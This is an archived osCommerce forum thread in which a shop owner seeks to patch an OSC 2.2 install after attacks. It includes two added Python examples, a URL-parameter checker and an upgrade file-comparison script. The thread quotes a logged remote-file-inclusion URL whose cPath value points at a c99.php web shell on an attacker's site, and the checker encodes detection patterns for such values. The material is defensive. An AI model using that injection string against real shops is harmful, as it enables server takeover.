
How do I upgrade my current install of OSC for security reasons?


Guest


I've been dealing with hack-attempts for a month by a variety of different people.

 

I need to upgrade my current version of OSC 2.2 for the latest security fixes.

 

When I log in to cPanel, I can see there is a link to update my version of OSC 2.2. But when I click on it, I get this warning:

 


Click on Upgrade only if
- no files, languages, themes have been modified
- you haven't added mods to this installation of OS Commerce
Info: Your current installation will be backed up.

Click on Upgrade in order to proceed.

 

Well, obviously I'm scared to death to click Upgrade as I have a number of contribs and damn near everything has been changed or modified from the stock install of OSC. What do I do?

 

Panicked this evening...again...when I was visiting my Who's Online feature in Admin and saw all kinds of crazy URLs attached to my website that had nothing to do with my website. Webhost said:

 

There is a cross-site scripting vulnerability in the index.php script. So, they did something. Disabled the ability to do it via their Apache server. But they're encouraging me to update the script for OSC. And I'm afraid to do it via cPanel. Where should I look for security fixes that I could manually install myself?


I've been dealing with hack-attempts for a month by a variety of different people.

Any evidence? How? Set the chmod on index.php to 755 or 644 (depends on webhost).

 

First you need to compare files using a utility like WinMerge, as I believe you have some contributions installed, and after that you can load the new files.

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing a contribution or editing/updating/deleting any files, do a full backup; it will save you & everyone here on the forum time fixing your issues.

Any issues with oscommerce, I am here to help you.


If you mean...how am I catching this? I'm seeing it in the Who's Online feature in Admin. I'll give you an example, of what I saw last night. The URL they were sitting on read something like this:

 

www.MYSITE.com/index.php?cPath=http://www.THEIRSITE.net/c99.php?

 

Saw another interesting one, too. Different, but...interesting, nonetheless, as no such URL should be generated.

 

www.mysite.com/product_info.php?products_id=1916{5}5

 

That appendage on the end of the URL of {5}5 is what's interesting.

 

The first URL appeared to take me to what LOOKED like my website...yet no such page exists. Header looked good. Left column and footer looked good. What they had done, was take really grainy, blurry screenshots (I guess) of the gifs that accompany each main or parent category in my site and assembled them all on one page as clickable links to the main categories the photos represent. Very bizarre.

 

The second URL, the one with the {5}5 on the end of it, took me to that particular product in my site and nothing looked out of sorts at all. I don't know what these people are attempting to do.

 

This happened to me a few weeks ago with a different website, doing something similar to the first URL I posted...where the link turned into one with their own URL attached on the end of it. Webhost did something then, but...whatever it was wasn't enough as there came the next one last night.

 

I've heard the horror stories about websites being hijacked and redirected to porn sites, but I don't understand what these 'hackers' are trying to do with my site.

 

first you need to compare files using utility like WinMerge, as I believe you have some contributions installed and after that you can load the new files.

 

What my webhost has set up is some kind of auto-install feature for this upgrade. In other words, if I click the Upgrade button...it's done. I don't get to see the files first. The upgrade will simply write over my existing files and I cannot do that.

Perhaps I'll write to them and see if they can provide me with the upgrade files and go from there.

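The two URLs from the post above, run through a small parameter check, as an added example that is not part of the original thread. It assumes stock osCommerce 2.2 parameter shapes (cPath as underscore-joined category ids, products_id as a product id with optional {option}value attribute pairs); the function names and the two extra sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Expected parameter shapes (an assumption of this example, based on stock osCommerce 2.2):
#   cPath        category ids joined by "_", e.g. 3_12
#   products_id  product id, optionally followed by {option_id}value_id pairs
EXPECTED = {
    "cPath": re.compile(r"\d+(_\d+)*"),
    "products_id": re.compile(r"\d+(\{\d+\}\d+)*"),
}
# A scheme or "//" prefix inside a parameter value means the value points at another host.
REMOTE_REF = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def check_request(url):
    """Return a list of (parameter, reason) findings for one request URL."""
    findings = []
    query = urlsplit(url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_REF.match(value):
            findings.append((name, "value is a URL"))
        elif name in EXPECTED and not EXPECTED[name].fullmatch(value):
            findings.append((name, "unexpected format"))
    return findings

def scan(urls):
    """Map each flagged URL to its findings; clean URLs are omitted."""
    return {u: f for u in urls if (f := check_request(u))}

SAMPLE = [
    "www.MYSITE.com/index.php?cPath=http://www.THEIRSITE.net/c99.php?",  # from the thread
    "www.mysite.com/product_info.php?products_id=1916{5}5",              # from the thread
    "www.mysite.com/index.php?cPath=3_12",                               # constructed
    "www.mysite.com/product_info.php?products_id=19x16",                 # constructed
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE).items():
        print(url, findings)
```

Under those assumptions the first URL is flagged because cPath carries a remote URL, while the {5}5 suffix fits the product-attribute form and is not flagged.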

Is this the latest update for OSC 2.2?

 

osCommerce 2.2 Milestone 2 Update 060817

 

If it is, I'll be able to use this just like a contribution...and edit the files manually.

 

Webhost can't give me a breakdown of what files are included in their update. All they can do is suggest I install it somewhere else and do a file compare.

 

But, if that link above is the latest and greatest update, I'll use that.

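One way to do the file comparison suggested in this thread without overwriting customised files, as an added example that is not osCommerce or webhost code. It goes a step beyond a two-way compare by assuming you also have an unmodified copy of the release you originally installed (`stock`) next to the update package (`update`) and a copy of your shop (`live`); the directory names and sample files are constructed.

```python
import hashlib
import tempfile
from pathlib import Path

def digest(path):
    """SHA-256 of a file, or None if it does not exist."""
    return hashlib.sha256(path.read_bytes()).hexdigest() if path.is_file() else None

def plan_upgrade(stock, update, live):
    """Classify every file shipped in `update` relative to the live shop."""
    plan = {}
    for new in sorted(p for p in Path(update).rglob("*") if p.is_file()):
        rel = new.relative_to(update)
        h_new = digest(new)
        h_old = digest(Path(stock) / rel)
        h_live = digest(Path(live) / rel)
        if h_live == h_new:
            plan[rel.as_posix()] = "already current"
        elif h_live is None or h_live == h_old:
            plan[rel.as_posix()] = "copy"    # never customised: safe to overwrite
        else:
            plan[rel.as_posix()] = "merge"   # customised locally: merge by hand
    return plan

def demo():
    """Build three tiny constructed trees and return the plan for them."""
    trees = {
        "stock":  {"index.php": "v1", "includes/application_top.php": "v1", "login.php": "v1"},
        "update": {"index.php": "v2", "includes/application_top.php": "v2", "login.php": "v2"},
        "live":   {"index.php": "v1 + contribution",
                   "includes/application_top.php": "v1", "login.php": "v2"},
    }
    with tempfile.TemporaryDirectory() as tmp:
        for tree, files in trees.items():
            for rel, text in files.items():
                path = Path(tmp, tree, rel)
                path.parent.mkdir(parents=True, exist_ok=True)
                path.write_text(text)
        return plan_upgrade(Path(tmp, "stock"), Path(tmp, "update"), Path(tmp, "live"))

if __name__ == "__main__":
    for name, action in demo().items():
        print(f"{action:16} {name}")
```

Only the files marked `merge` need a side-by-side tool such as WinMerge; run it against copies and take a full backup first.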

Archived

This topic is now archived and is closed to further replies.
